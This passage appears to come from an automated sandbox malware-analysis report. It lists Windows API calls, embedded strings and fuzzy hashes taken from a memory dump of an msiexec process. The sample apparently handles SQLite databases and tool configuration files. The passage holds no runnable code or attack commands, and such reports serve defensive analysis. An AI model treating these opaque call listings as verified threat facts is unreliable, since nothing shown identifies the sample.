                                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                              • memset.MSVCRT ref: 0044505E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memchrmemset
                                                                                              • String ID: PD$PD
                                                                                              • API String ID: 1581201632-2312785699
                                                                                              • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                              • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                              • String ID:
                                                                                              • API String ID: 2163313125-0
                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3592753638-3916222277
                                                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                              • String ID: %s (%s)$YV@
                                                                                              • API String ID: 3979103747-598926743
                                                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                              • API String ID: 2767993716-572158859
                                                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                              APIs
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 3176057301-2039793938
                                                                                              • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                              • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                              APIs
                                                                                              Strings
                                                                                              • out of memory, xrefs: 0042F865
                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                              • database is already attached, xrefs: 0042F721
                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                              • API String ID: 1297977491-2001300268
                                                                                              • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                              • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                              APIs
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                              • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                              • String ID: ($d
                                                                                              • API String ID: 1140211610-1915259565
                                                                                              • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                              • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                              APIs
                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                              • String ID:
                                                                                              • API String ID: 3015003838-0
                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                              • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00407E44
                                                                                              • memset.MSVCRT ref: 00407E5B
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                              • wcscpy.MSVCRT ref: 00407F10
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 59245283-0
                                                                                              • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                              • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                              • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                              • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                              • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                              • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                              • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                              • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                              • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                              • memset.MSVCRT ref: 00413ADC
                                                                                              • memset.MSVCRT ref: 00413AEC
                                                                                                • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                              • memset.MSVCRT ref: 00413BD7
                                                                                              • wcscpy.MSVCRT ref: 00413BF8
                                                                                              • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                              • String ID: 3A
                                                                                              • API String ID: 3300951397-293699754
                                                                                              • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                              • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                              • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                              • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                              • String ID: strings
                                                                                              • API String ID: 3166385802-3030018805
                                                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                              • String ID: r!A
                                                                                              • API String ID: 2791114272-628097481
                                                                                              • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                              • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                              • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                              • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                              • String ID: BIN
                                                                                              • API String ID: 1668488027-1015027815
                                                                                              • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                              • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                              • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                              • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00411AF6
                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                              • wcsrchr.MSVCRT ref: 00411B14
                                                                                              • wcscat.MSVCRT ref: 00411B2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                              • String ID: AE$.cfg$General$EA
                                                                                              • API String ID: 776488737-1622828088
                                                                                              • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                              • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                              • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                              • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040D8BD
                                                                                              • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                              • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                              • memset.MSVCRT ref: 0040D906
                                                                                              • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                              • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 1028950076-4169760276
                                                                                              • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                              • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                              • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                              • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                              APIs
                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                              • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                              • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                              • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                              • memset.MSVCRT ref: 0041BA3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memset
                                                                                              • String ID: -journal$-wal
                                                                                              • API String ID: 438689982-2894717839
                                                                                              • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                              • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                              • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                              • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000B.00000002.2371651618.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
